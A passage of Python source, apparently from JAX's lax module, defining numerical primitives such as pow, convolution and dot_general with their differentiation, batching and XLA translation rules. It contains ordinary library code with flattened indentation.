if dtypes.issubdtype(input_dtype, np.complexfloating):
return [conj(t)]
else:
return [real(t)]
xla.translations[conj_p] = lambda c, x, **kwargs: xops.Conj(x)
ad.primitive_jvps[conj_p] = partial(ad.linear_jvp, conj_p)
ad.primitive_transposes[conj_p] = _conj_transpose_rule
abs_p = unop(_complex_basetype, _num, 'abs')
def _abs_jvp_rule(g, ans, x):
if _iscomplex(x):
return _maybe_real(mul(g, div(_maybe_conj(x),
_replace_zero(convert_element_type(ans, _dtype(x))))))
else:
return select(ge(x, _zero(x)), g, neg(g))
ad.defjvp2(abs_p, _abs_jvp_rule)
_maybe_conj = lambda x: conj(x) if _iscomplex(x) else x
_maybe_real = lambda x: real(x) if _iscomplex(x) else x
sqrt_p = standard_unop(_float | _complex, 'sqrt')
ad.defjvp2(sqrt_p, lambda g, ans, x: mul(g, div(_const(x, 0.5), ans)))
rsqrt_p = standard_unop(_float | _complex, 'rsqrt')
ad.defjvp2(rsqrt_p,
lambda g, ans, x:
mul(g, mul(_const(x, -0.5), pow(x, _const(x, -1.5)))))
pow_p = standard_naryop([_float | _complex, _float | _complex], 'pow')
def _pow_jvp_lhs(g, ans, x, y):
jac = mul(y, pow(x, select(eq(y, _zeros(y)), _ones(y), sub(y, _ones(y)))))
return mul(_brcast(g, y), jac)
def _pow_jvp_rhs(g, ans, x, y):
return mul(_brcast(g, x), mul(log(_replace_zero(x)), ans))
ad.defjvp2(pow_p, _pow_jvp_lhs, _pow_jvp_rhs)
def _integer_pow_dtype_rule(x, *, y):
dtype = unop_dtype_rule(_identity, _int | _float | _complex, 'integer_pow', x)
if y < 0 and dtypes.issubdtype(dtype, np.integer):
raise TypeError("Integers cannot be raised to negative powers, got "
f"integer_pow({x}, {y})")
return dtype
def _integer_pow_translation_rule(c, x, *, y):
if y == 0:
shape = c.get_shape(x)
one = xb.constant(c, np.array(1, dtype=shape.numpy_dtype()))
return xops.Broadcast(one, shape.dimensions())
is_reciprocal = y < 0
if is_reciprocal:
y = -y
acc = None
while y > 0:
if y & 1:
acc = x if acc is None else xops.Mul(acc, x)
y >>= 1
if y > 0:
x = xops.Mul(x, x)
return xops.Reciprocal(acc) if is_reciprocal else acc
def _integer_pow_jvp(g, x, *, y):
return _zeros(g) if y == 0 else mul(g, mul(_const(x, y), integer_pow(x, y - 1)))
integer_pow_p = standard_primitive(
_attrgetter('shape'), _integer_pow_dtype_rule, 'integer_pow',
translation_rule=_integer_pow_translation_rule)
batching.defvectorized(integer_pow_p)
masking.defvectorized(integer_pow_p)
ad.defjvp(integer_pow_p, _integer_pow_jvp)
_replace_zero = lambda x: select(eq(x, _const(x, 0)), _ones(x), x)
not_p = standard_unop(_bool_or_int, 'not')
ad.defjvp_zero(not_p)
and_p = standard_naryop([_bool_or_int, _bool_or_int], 'and')
ad.defjvp_zero(and_p)
or_p = standard_naryop([_bool_or_int, _bool_or_int], 'or')
ad.defjvp_zero(or_p)
xor_p = standard_naryop([_bool_or_int, _bool_or_int], 'xor')
ad.defjvp_zero(xor_p)
population_count_p = standard_unop(_int, 'population_count')
def _add_transpose(t, x, y):
# The following linearity assertion is morally true, but because in some cases we
# instantiate zeros for convenience, it doesn't always hold.
# assert ad.is_undefined_primal(x) and ad.is_undefined_primal(y)
return [t, t]
add_p = standard_naryop([_num, _num], 'add')
ad.defjvp(add_p, lambda g, x, y: _brcast(g, y), lambda g, x, y: _brcast(g, x))
ad.primitive_transposes[add_p] = _add_transpose
def _add_inverse(r, x, y):
xr = r - y
yr = r - x
return xr, yr
iad.definverse(add_p, _add_inverse)
def _sub_transpose(t, x, y):
# The following linearity assertion is morally true, but because in some cases
# we instantiate zeros for convenience, it doesn't always hold.
# TODO(mattjj): re-enable this assertion, don't return None below
# assert ad.is_undefined_primal(x) and ad.is_undefined_primal(y)
if type(t) is ad_util.Zero:
x_bar = ad_util.Zero(x.aval) if ad.is_undefined_primal(x) else None
y_bar = ad_util.Zero(y.aval) if ad.is_undefined_primal(y) else None
return [x_bar, y_bar]
else:
return [t, neg(t)]
sub_p = standard_naryop([_num, _num], 'sub')
ad.defjvp(sub_p,
lambda g, x, y: _brcast(g, y),
lambda g, x, y: _brcast(neg(g), x))
ad.primitive_transposes[sub_p] = _sub_transpose
mul_p = standard_naryop([_num, _num], 'mul')
ad.defbilinear_broadcasting(_brcast, mul_p, mul, mul)
def _mul_inverse(r, x, y):
xr = r / y
yr = r / x
return xr, yr
iad.definverse(mul_p, _mul_inverse)
def _div_transpose_rule(cotangent, x, y):
assert ad.is_undefined_primal(x) and not ad.is_undefined_primal(y)
res = ad_util.Zero(x.aval) if type(cotangent) is ad_util.Zero else div(cotangent, y)
return res, None
div_p = standard_naryop([_num, _num], 'div')
ad.defjvp(div_p,
lambda g, x, y: div(_brcast(g, y), y),
lambda g, x, y: mul(mul(neg(_brcast(g, x)), x), integer_pow(y, -2)))
ad.primitive_transposes[div_p] = _div_transpose_rule
rem_p = standard_naryop([_num, _num], 'rem')
ad.defjvp(rem_p,
lambda g, x, y: _brcast(g, y),
lambda g, x, y: mul(_brcast(neg(g), x), floor(div(x, y))))
def _broadcasting_select(c, which, x, y):
"""Wrapper around XLA `Select` that broadcasts its arguments."""
which_shape, x_shape, y_shape = (
c.get_shape(t).dimensions() for t in (which, x, y))
out_shape = broadcast_shapes(which_shape, x_shape, y_shape)
bcast_dims = lambda shape: tuple(range(len(out_shape) - len(shape),
len(out_shape)))
which = xops.BroadcastInDim(which, out_shape, bcast_dims(which_shape))
x = xops.BroadcastInDim(x, out_shape, bcast_dims(x_shape))
y = xops.BroadcastInDim(y, out_shape, bcast_dims(y_shape))
return xops.Select(which, x, y)
def _minmax_translation_rule(c, x, y, *, minmax=None, cmp=None):
dtype = c.get_shape(x).numpy_dtype()
if dtypes.issubdtype(dtype, np.complexfloating):
rx = xops.Real(x)
ry = xops.Real(y)
return _broadcasting_select(
c, xops.Select(xops.Eq(rx, ry), cmp(xops.Imag(x), xops.Imag(y)),
cmp(rx, ry)),
x, y)
return minmax(x, y)
max_p: core.Primitive = standard_naryop(
[_any, _any], 'max', translation_rule=partial(
_minmax_translation_rule, minmax=xops.Max, cmp=xops.Gt))
ad.defjvp2(max_p,
lambda g, ans, x, y: mul(_brcast(g, y), _balanced_eq(x, ans, y)),
lambda g, ans, x, y: mul(_brcast(g, x), _balanced_eq(y, ans, x)))
min_p: core.Primitive = standard_naryop(
[_any, _any], 'min', translation_rule=partial(
_minmax_translation_rule, minmax=xops.Min, cmp=xops.Lt))
ad.defjvp2(min_p,
lambda g, ans, x, y: mul(_brcast(g, y), _balanced_eq(x, ans, y)),
lambda g, ans, x, y: mul(_brcast(g, x), _balanced_eq(y, ans, x)))
shift_left_p = standard_naryop([_int, _int], 'shift_left')
ad.defjvp_zero(shift_left_p)
shift_right_arithmetic_p = standard_naryop([_int, _int], 'shift_right_arithmetic')
ad.defjvp_zero(shift_right_arithmetic_p)
shift_right_logical_p = standard_naryop([_int, _int], 'shift_right_logical')
ad.defjvp_zero(shift_right_logical_p)
eq_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'eq')
ad.defjvp_zero(eq_p)
ne_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'ne')
ad.defjvp_zero(ne_p)
ge_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'ge')
ad.defjvp_zero(ge_p)
gt_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'gt')
ad.defjvp_zero(gt_p)
le_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'le')
ad.defjvp_zero(le_p)
lt_p = naryop(_fixed_dtype(np.bool_), [_any, _any], 'lt')
ad.defjvp_zero(lt_p)
def _convert_element_type_shape_rule(operand, *, new_dtype, weak_type):
return operand.shape
def _convert_element_type_dtype_rule(operand, *, new_dtype, weak_type):
return new_dtype
def _convert_element_type_weak_type_rule(operand, *, new_dtype, weak_type):
return weak_type
def _convert_element_type_translation_rule(c, operand, *, new_dtype, weak_type):
old_dtype = c.get_shape(operand).numpy_dtype()
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
operand = xops.Real(operand)
new_etype = xla_client.dtype_to_etype(new_dtype)
return xops.ConvertElementType(operand, new_element_type=new_etype)
def _convert_element_type_transpose_rule(ct, operand, *, new_dtype, weak_type):
assert ad.is_undefined_primal(operand)
old_dtype = operand.aval.dtype
old_weak_type = dtypes.is_weakly_typed(operand)
if type(ct) is ad_util.Zero:
return [ad_util.Zero(operand.aval)]
elif core.primal_dtype_to_tangent_dtype(old_dtype) is dtypes.float0:
return [ad_util.Zero(operand.aval.update(dtype=dtypes.float0, weak_type=False))]
else:
return [convert_element_type_p.bind(ct, new_dtype=old_dtype, weak_type=old_weak_type)]
def _convert_element_type_jvp_rule(tangent, operand , *, new_dtype, weak_type):
if core.primal_dtype_to_tangent_dtype(new_dtype) is dtypes.float0:
return ad_util.Zero(tangent.aval.update(dtype=dtypes.float0, weak_type=False))
else:
return convert_element_type_p.bind(tangent, new_dtype=new_dtype, weak_type=weak_type)
convert_element_type_p = standard_primitive(
_convert_element_type_shape_rule, _convert_element_type_dtype_rule,
'convert_element_type', _convert_element_type_translation_rule,
weak_type_rule=_convert_element_type_weak_type_rule)
ad.defjvp(convert_element_type_p, _convert_element_type_jvp_rule)
ad.primitive_transposes[convert_element_type_p] = _convert_element_type_transpose_rule
batching.defvectorized(convert_element_type_p)
masking.defvectorized(convert_element_type_p)
def _bitcast_convert_type_shape_rule(operand, *, new_dtype):
return operand.shape
def _bitcast_convert_type_dtype_rule(operand, *, new_dtype):
return new_dtype
def _bitcast_convert_type_translation_rule(c, operand, *, new_dtype):
new_etype = xla_bridge.dtype_to_etype(new_dtype)
return xops.BitcastConvertType(operand, new_element_type=new_etype)
bitcast_convert_type_p = standard_primitive(
_bitcast_convert_type_shape_rule, _bitcast_convert_type_dtype_rule,
'bitcast_convert_type', _bitcast_convert_type_translation_rule,
weak_type_rule=_strip_weak_type)
ad.defjvp_zero(bitcast_convert_type_p)
batching.defvectorized(bitcast_convert_type_p)
masking.defvectorized(bitcast_convert_type_p)
def _conv_general_dilated_shape_rule(
lhs: ShapedArray, rhs: ShapedArray, *, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count,
batch_group_count, **unused_kwargs) -> Tuple[int, ...]:
assert type(dimension_numbers) is ConvDimensionNumbers
if len(lhs.shape) != len(rhs.shape):
msg = ("conv_general_dilated lhs and rhs must have the same number of "
"dimensions, but got {} and {}.")
raise ValueError(msg.format(lhs.shape, rhs.shape))
if not feature_group_count > 0:
msg = ("conv_general_dilated feature_group_count "
"must be a positive integer, got {}.")
raise ValueError(msg.format(feature_group_count))
lhs_feature_count = lhs.shape[dimension_numbers.lhs_spec[1]]
quot, rem = divmod(lhs_feature_count, feature_group_count)
if rem:
msg = ("conv_general_dilated feature_group_count must divide lhs feature "
"dimension size, but {} does not divide {}.")
raise ValueError(msg.format(feature_group_count, lhs_feature_count))
if quot != rhs.shape[dimension_numbers.rhs_spec[1]]:
msg = ("conv_general_dilated lhs feature dimension size divided by "
"feature_group_count must equal the rhs input feature dimension "
"size, but {} // {} != {}.")
raise ValueError(msg.format(lhs_feature_count, feature_group_count,
rhs.shape[dimension_numbers.rhs_spec[1]]))
if rhs.shape[dimension_numbers.rhs_spec[0]] % feature_group_count:
msg = ("conv_general_dilated rhs output feature dimension size must be a "
"multiple of feature_group_count, but {} is not a multiple of {}.")
raise ValueError(msg.format(rhs.shape[dimension_numbers.rhs_spec[0]],
feature_group_count))
if not batch_group_count > 0:
msg = ("conv_general_dilated batch_group_count "
"must be a positive integer, got {}.")
raise ValueError(msg.format(batch_group_count))
lhs_batch_count = lhs.shape[dimension_numbers.lhs_spec[0]]
if lhs_batch_count % batch_group_count != 0:
msg = ("conv_general_dilated batch_group_count must divide lhs batch "
"dimension size, but {} does not divide {}.")
raise ValueError(msg.format(batch_group_count, lhs_batch_count))
if rhs.shape[dimension_numbers.rhs_spec[0]] % batch_group_count:
msg = ("conv_general_dilated rhs output feature dimension size must be a "
"multiple of batch_group_count, but {} is not a multiple of {}.")
raise ValueError(msg.format(rhs.shape[dimension_numbers.rhs_spec[0]],
batch_group_count))
if batch_group_count > 1 and feature_group_count > 1:
msg = ("At most one of batch_group_count and feature_group_count may be > "
"1, got batch_group_count={} and feature_group_count={}")
raise ValueError(msg.format(batch_group_count, feature_group_count))
if len(_conv_sdims(dimension_numbers.rhs_spec)) != len(window_strides):
msg = ("conv_general_dilated window and window_strides must have "
"the same number of dimensions, but got {} and {}")
raise ValueError(
msg.format(len(_conv_sdims(dimension_numbers.rhs_spec)), len(window_strides)))
lhs_perm, rhs_perm, out_perm = dimension_numbers
lhs_trans = _dilate_shape(np.take(lhs.shape, lhs_perm), lhs_dilation)
rhs_trans = _dilate_shape(np.take(rhs.shape, rhs_perm), rhs_dilation)
out_trans = conv_shape_tuple(lhs_trans, rhs_trans, window_strides, padding,
batch_group_count)
return tuple(np.take(out_trans, np.argsort(out_perm))) # type: ignore[arg-type]
def _conv_general_dilated_dtype_rule(
lhs, rhs, *, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, **unused_kwargs):
return naryop_dtype_rule(_input_dtype, [_float | _complex, _float | _complex],
'conv_general_dilated', lhs, rhs)
_conv_spec_transpose = lambda spec: (spec[1], spec[0]) + spec[2:]
_conv_sdims = lambda spec: spec[2:]
# Understanding the convolution transpose rules:
# Ignoring the spatial dimensions, let m = batch, j = input feature,
# k = output feature.
#
# Convolution computes the following contraction:
# Forward: [m, j] [j, k] -> [m, k]
#
# The transposes are similar to the rules for transposing a matmul:
# LHS transpose: [m, k] [k, j] -> [m, j]
# RHS transpose: [j, m] [m, k] -> [j, k]
#
# With feature grouping, we have the following signatures:
# Forward: [m, gj] [j, gk] -> [m, gk]
# LHS transpose: [m, gk] [k, gj] -> [m, gj]
# --> implemented as feature grouping after transposing the group from the
# kernel input features to the kernel output features.
# RHS transpose: [gj, m] [m, gk] -> [j, gk]
# --> which is batch grouping.
#
# With batch grouping, we have the following signatures:
# Forward: [gm,j] [j,gk]->[m,gk]
# LHS transpose: [m, gk][gk, j] -> [gm, j]
# --> implemented as feature grouping with transposing the group on the kernel
# and the output.
# RHS transpose: [j, gm][m, gk] -> [j, gk]
# --> which is feature grouping.
def _conv_general_dilated_transpose_lhs(
g, rhs, *, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
lhs_shape, rhs_shape, precision):
assert type(dimension_numbers) is ConvDimensionNumbers
assert batch_group_count == 1 or feature_group_count == 1
lhs_sdims, rhs_sdims, out_sdims = map(_conv_sdims, dimension_numbers)
lhs_spec, rhs_spec, out_spec = dimension_numbers
t_rhs_spec = _conv_spec_transpose(rhs_spec)
if feature_group_count > 1:
# in addition to switching the dims in the spec, need to move the feature
# group axis into the transposed rhs's output feature dim
rhs = _reshape_axis_out_of(rhs_spec[0], feature_group_count, rhs)
rhs = _reshape_axis_into(rhs_spec[0], rhs_spec[1], rhs)
elif batch_group_count > 1:
rhs = _reshape_axis_out_of(rhs_spec[0], batch_group_count, rhs)
rhs = _reshape_axis_into(rhs_spec[0], rhs_spec[1], rhs)
feature_group_count = batch_group_count
trans_dimension_numbers = ConvDimensionNumbers(out_spec, t_rhs_spec, lhs_spec)
padding = _conv_general_vjp_lhs_padding(
np.take(lhs_shape, lhs_sdims), np.take(rhs_shape, rhs_sdims),
window_strides, np.take(g.shape, out_sdims), padding, lhs_dilation,
rhs_dilation)
revd_weights = rev(rhs, rhs_sdims)
out = conv_general_dilated(
g, revd_weights, window_strides=lhs_dilation, padding=padding,
lhs_dilation=window_strides, rhs_dilation=rhs_dilation,
dimension_numbers=trans_dimension_numbers,
feature_group_count=feature_group_count,
batch_group_count=1, precision=precision)
if batch_group_count > 1:
out = _reshape_axis_out_of(lhs_spec[1], batch_group_count, out)
out = _reshape_axis_into(lhs_spec[1], lhs_spec[0], out)
return out
def _conv_general_dilated_transpose_rhs(
g, lhs, *, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers: ConvDimensionNumbers, feature_group_count: int,
batch_group_count: int, lhs_shape, rhs_shape, precision):
assert type(dimension_numbers) is ConvDimensionNumbers
if np.size(g) == 0:
# Avoids forming degenerate convolutions where the RHS has spatial size 0.
# Awkwardly, we don't have an aval for the rhs readily available, so instead
# of returning an ad_util.Zero instance here, representing a symbolic zero
# value, we instead return a None, which is meant to represent having no
# cotangent at all (and is thus incorrect for this situation), since the two
# are treated the same operationally.
# TODO(mattjj): adjust defbilinear so that the rhs aval is available here
return None
lhs_sdims, rhs_sdims, out_sdims = map(_conv_sdims, dimension_numbers)
lhs_trans, rhs_trans, out_trans = map(_conv_spec_transpose, dimension_numbers)
assert batch_group_count == 1 or feature_group_count == 1
if batch_group_count > 1:
feature_group_count = batch_group_count
batch_group_count = 1
elif feature_group_count > 1:
batch_group_count = feature_group_count
feature_group_count = 1
trans_dimension_numbers = ConvDimensionNumbers(lhs_trans, out_trans, rhs_trans)
padding = _conv_general_vjp_rhs_padding(
np.take(lhs_shape, lhs_sdims), np.take(rhs_shape, rhs_sdims),
window_strides, np.take(g.shape, out_sdims), padding, lhs_dilation,
rhs_dilation)
return conv_general_dilated(
lhs, g, window_strides=rhs_dilation, padding=padding,
lhs_dilation=lhs_dilation, rhs_dilation=window_strides,
dimension_numbers=trans_dimension_numbers,
feature_group_count=feature_group_count,
batch_group_count=batch_group_count, precision=precision)
def _conv_general_dilated_translation_rule(
c, lhs, rhs, *, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count,
batch_group_count, precision, expand_complex_convolutions, **unused_kwargs):
assert type(dimension_numbers) is ConvDimensionNumbers
dimension_numbers = _conv_general_proto(dimension_numbers)
precision_config = _precision_config(precision)
dtype = c.get_shape(lhs).numpy_dtype()
conv = lambda x, y: xops.ConvGeneralDilated(
x, y, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
precision_config=precision_config)
if expand_complex_convolutions and np.issubdtype(dtype, np.complexfloating):
# We use a trick for complex multiplication due to Gauss which uses three
# multiplications and five additions; instead of the naive method of four
# multiplications and two additions.
# https://en.wikipedia.org/wiki/Multiplication_algorithm#Complex_multiplication_algorithm
#
# This performance win comes with a trade-off in accuracy; especially in
# cases when the real and imaginary differ hugely in magnitude. The relative
# error bound (e.g. 1p-24 in case of float32) would be relative to the
# maximum of real and imaginary parts of the result instead of being
# satisfied by the real and imaginary parts independently of each other.
lhs_real, lhs_imag = xops.Real(lhs), xops.Imag(lhs)
rhs_real, rhs_imag = xops.Real(rhs), xops.Imag(rhs)
k1 = conv(xops.Add(lhs_real, lhs_imag), rhs_real)
k2 = conv(lhs_real, xops.Sub(rhs_imag, rhs_real))
k3 = conv(lhs_imag, xops.Add(rhs_real, rhs_imag))
return xops.Complex(xops.Sub(k1, k3), xops.Add(k1, k2))
return conv(lhs, rhs)
def _conv_general_dilated_batch_rule(
batched_args, batch_dims, *, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count, precision, **unused_kwargs):
assert batch_group_count == 1 or feature_group_count == 1
lhs, rhs = batched_args
lhs_bdim, rhs_bdim = batch_dims
lhs_spec, rhs_spec, out_spec = dimension_numbers
if lhs_bdim is not None and rhs_bdim is not None:
assert lhs.shape[lhs_bdim] == rhs.shape[rhs_bdim]
if batch_group_count > 1:
new_lhs = _reshape_axis_into(lhs_bdim, lhs_spec[0], lhs)
batch_group_count *= lhs.shape[lhs_bdim]
else:
new_lhs = _reshape_axis_into(lhs_bdim, lhs_spec[1], lhs)
feature_group_count *= lhs.shape[lhs_bdim]
new_rhs = _reshape_axis_into(rhs_bdim, rhs_spec[0], rhs)
out = conv_general_dilated(
new_lhs, new_rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count=feature_group_count,
batch_group_count=batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[1], lhs.shape[lhs_bdim], out)
return out, out_spec[1]
elif lhs_bdim is not None:
if batch_group_count == 1:
new_lhs = _reshape_axis_into(lhs_bdim, lhs_spec[0], lhs)
out = conv_general_dilated(new_lhs, rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, precision=precision)
out = _reshape_axis_out_of(out_spec[0], lhs.shape[lhs_bdim], out)
return out, out_spec[0]
else:
new_lhs = _reshape_axis_out_of(lhs_spec[0] + int(lhs_bdim <= lhs_spec[0]),
batch_group_count, lhs)
new_lhs = _reshape_axis_into(lhs_bdim + int(lhs_spec[0] < lhs_bdim),
lhs_spec[0] + 1,
new_lhs)
new_lhs = _reshape_axis_into(lhs_spec[0], lhs_spec[0], new_lhs)
out = conv_general_dilated(new_lhs, rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[0], lhs.shape[lhs_bdim], out)
return out, out_spec[0]
elif rhs_bdim is not None:
if feature_group_count == 1 and batch_group_count == 1:
new_rhs = _reshape_axis_into(rhs_bdim, rhs_spec[0], rhs)
out = conv_general_dilated(lhs, new_rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[1], rhs.shape[rhs_bdim], out)
return out, out_spec[1]
else:
# groups need to be outermost, so we need to factor them out of the
# rhs output feature dim, then factor the batch dim into the remaining rhs
# output feature dim, then put groups back in. We do something
# similar on the output. An alternative which would require more FLOPs but
# fewer reshapes would be to broadcast lhs.
group_count = (feature_group_count if feature_group_count > 1
else batch_group_count)
new_rhs = _reshape_axis_out_of(rhs_spec[0] + int(rhs_bdim <= rhs_spec[0]),
group_count, rhs)
new_rhs = _reshape_axis_into(rhs_bdim + int(rhs_spec[0] < rhs_bdim),
rhs_spec[0] + 1,
new_rhs)
new_rhs = _reshape_axis_into(rhs_spec[0], rhs_spec[0], new_rhs)
out = conv_general_dilated(lhs, new_rhs, window_strides, padding,
lhs_dilation, rhs_dilation, dimension_numbers,
feature_group_count, batch_group_count,
precision=precision)
out = _reshape_axis_out_of(out_spec[1], group_count, out)
out = _reshape_axis_out_of(out_spec[1] + 1, rhs.shape[rhs_bdim], out)
out = _reshape_axis_into(out_spec[1], out_spec[1] + 1, out)
return out, out_spec[1]
def _masked(padded_value, logical_shape, dimensions, value=0):
"""
Sets all padding to the given value (default is 0) in the given dimensions.
All values outside the logical shape are considered padding.
"""
if len(dimensions) == 0:
return padded_value
masks = [broadcasted_iota(np.int32, padded_value.shape, d) < logical_shape[d]
for d in dimensions]
mask_intersection = masks[0]
for mask in masks[1:]:
mask_intersection &= mask
return select(mask_intersection, padded_value, full_like(padded_value, value))
def _conv_general_dilated_masking_rule(
padded_vals, logical_shapes, window_strides, padding, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count, batch_group_count,
lhs_shape, rhs_shape, precision):
lhs, rhs = padded_vals
logical_lhs_shape, logical_rhs_shape = logical_shapes
o, i, *window_dimensions = dimension_numbers.rhs_spec
assert (np.all(np.take(rhs.shape, window_dimensions)
== np.take(logical_rhs_shape, window_dimensions))), \
"Conv filter masking not yet implemented."
n, c, *padded_dimensions = dimension_numbers.lhs_spec
return conv_general_dilated(
_masked(lhs, logical_lhs_shape, padded_dimensions),
_masked(rhs, logical_rhs_shape, (i,)),
window_strides=window_strides, padding=padding,
lhs_dilation=lhs_dilation, rhs_dilation=rhs_dilation,
dimension_numbers=dimension_numbers,
feature_group_count=feature_group_count,
batch_group_count=batch_group_count,
precision=precision)
conv_general_dilated_p = standard_primitive(
_conv_general_dilated_shape_rule, _conv_general_dilated_dtype_rule,
'conv_general_dilated', partial(_conv_general_dilated_translation_rule,
expand_complex_convolutions=False))
# TODO(b/161124619, b/161126248): XLA does not support complex convolution on
# CPU or GPU; on these backends, lower complex convolutions away.
xla.backend_specific_translations['cpu'][conv_general_dilated_p] = partial(
_conv_general_dilated_translation_rule, expand_complex_convolutions=True)
xla.backend_specific_translations['gpu'][conv_general_dilated_p] = partial(
_conv_general_dilated_translation_rule, expand_complex_convolutions=True)
ad.defbilinear(conv_general_dilated_p,
_conv_general_dilated_transpose_lhs,
_conv_general_dilated_transpose_rhs)
batching.primitive_batchers[conv_general_dilated_p] = \
_conv_general_dilated_batch_rule
masking.masking_rules[conv_general_dilated_p] = \
_conv_general_dilated_masking_rule
def _reshape_axis_into(src, dst, x):
perm = [i for i in range(x.ndim) if i != src]
perm.insert(dst, src)
new_shape = list(np.delete(x.shape, src))
new_shape[dst] *= x.shape[src]
return reshape(x, new_shape, perm)
def _reshape_axis_out_of(src, size1, x):
shape = list(x.shape)
size2, ragged = divmod(shape[src], size1)
assert not ragged
shape[src:src+1] = [size1, size2]
return reshape(x, shape)
def _precision_config(precision):
if precision is not None:
config = xla_client.PrecisionConfig()
if isinstance(precision, tuple):
config.operand_precision.extend(precision)
else:
config.operand_precision.extend((precision, precision))
return config
return None
def _dot_general_shape_rule(lhs, rhs, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
(lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
if not all(np.all(np.greater_equal(d, 0)) and np.all(np.less(d, lhs.ndim))
for d in (lhs_contracting, lhs_batch)):
msg = ("dot_general requires lhs dimension numbers to be nonnegative and "
"less than the number of axes of the lhs value, got "
f"lhs_batch of {lhs_batch} and lhs_contracting of {lhs_contracting} "
f"for lhs of rank {lhs.ndim}")
raise TypeError(msg)
if not all(np.all(np.greater_equal(d, 0)) and np.all(np.less(d, rhs.ndim))
for d in (rhs_contracting, rhs_batch)):
msg = ("dot_general requires rhs dimension numbers to be nonnegative and "
"less than the number of axes of the rhs value, got "
f"rhs_batch of {rhs_batch} and rhs_contracting of {rhs_contracting} "
f"for rhs of rank {rhs.ndim}")
raise TypeError(msg)
if len(lhs_batch) != len(rhs_batch):
msg = ("dot_general requires equal numbers of lhs_batch and rhs_batch "
"dimensions, got lhs_batch {} and rhs_batch {}.")
raise TypeError(msg.format(lhs_batch, rhs_batch))
lhs_contracting_set, lhs_batch_set = set(lhs_contracting), set(lhs_batch)
rhs_contracting_set, rhs_batch_set = set(rhs_contracting), set(rhs_batch)
if len(lhs_batch_set) != len(lhs_batch):
msg = ("dot_general requires lhs batch dimensions to be distinct, got "
f"lhs_batch {lhs_batch}.")
raise TypeError(msg)
if len(rhs_batch_set) != len(rhs_batch):
msg = ("dot_general requires rhs batch dimensions to be distinct, got "
f"rhs_batch {rhs_batch}.")
raise TypeError(msg)
if len(lhs_contracting_set) != len(lhs_contracting):
msg = ("dot_general requires lhs contracting dimensions to be distinct, "
f"got lhs_contracting {lhs_contracting}.")
raise TypeError(msg)
if len(rhs_contracting_set) != len(rhs_contracting):
msg = ("dot_general requires rhs contracting dimensions to be distinct, "
f"got rhs_contracting {rhs_contracting}.")
raise TypeError(msg)
if lhs_contracting_set & lhs_batch_set:
msg = ("dot_general requires lhs batch dimensions to be disjoint from "
"contracting dimensions, got lhs_batch {} and lhs_contracting {}.")
raise TypeError(msg.format(lhs_batch, lhs_contracting))
if rhs_contracting_set & rhs_batch_set:
msg = ("dot_general requires rhs batch dimensions to be disjoint from "
"contracting dimensions, got rhs_batch {} and rhs_contracting {}.")
raise TypeError(msg.format(rhs_batch, rhs_contracting))
lhs_batch_shape = np.take(lhs.shape, lhs_batch)
rhs_batch_shape = np.take(rhs.shape, rhs_batch)
if not np.all(np.equal(lhs_batch_shape, rhs_batch_shape)):
msg = ("dot_general requires lhs batch dimensions and rhs batch dimensions "
"to have the same shape, got {} and {}.")
raise TypeError(msg.format(lhs_batch_shape, rhs_batch_shape))
lhs_contracting_shape = np.take(lhs.shape, lhs_contracting)
rhs_contracting_shape = np.take(rhs.shape, rhs_contracting)
if not np.all(np.equal(lhs_contracting_shape, rhs_contracting_shape)):
msg = ("dot_general requires contracting dimensions to have the same "
"shape, got {} and {}.")
raise TypeError(msg.format(lhs_contracting_shape, rhs_contracting_shape))
batch_shape = tuple(lhs_batch_shape)
lhs_contract_or_batch = tuple(sorted(tuple(lhs_contracting) + tuple(lhs_batch)))
lhs_tensored_shape = tuple(np.delete(lhs.shape, lhs_contract_or_batch))
rhs_contract_or_batch = tuple(sorted(tuple(rhs_contracting) + tuple(rhs_batch)))
rhs_tensored_shape = tuple(np.delete(rhs.shape, rhs_contract_or_batch))
return batch_shape + lhs_tensored_shape + rhs_tensored_shape
def _dot_general_dtype_rule(lhs, rhs, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
input_dtype = naryop_dtype_rule(_input_dtype, [_any, _any], 'dot_general', lhs, rhs)
if preferred_element_type is None:
return input_dtype
if dtypes.issubdtype(input_dtype, np.integer) and not dtypes.issubdtype(preferred_element_type, np.integer):
raise TypeError("`preferred_element_type` and the original type must both be integral or both be floating point.")
if dtypes.issubdtype(input_dtype, np.signedinteger) and not dtypes.issubdtype(preferred_element_type, np.signedinteger):
raise TypeError("`preferred_element_type` must have the same signedness as the original type.")
input_bitwidth = np.dtype(input_dtype).itemsize
preferred_bitwidth = np.dtype(preferred_element_type).itemsize
if preferred_bitwidth < input_bitwidth:
raise TypeError("`preferred_element_type` must not be narrower than the original type.")
return preferred_element_type
def _dot_general_transpose_lhs(g, y, *, dimension_numbers, precision,
preferred_element_type: Optional[DType],
swap_ans=False):
(x_contract, y_contract), (x_batch, y_batch) = dimension_numbers
x_ndim = g.ndim - y.ndim + len(x_batch) + 2 * len(x_contract)
x_kept = remaining(range(x_ndim), x_contract, x_batch)
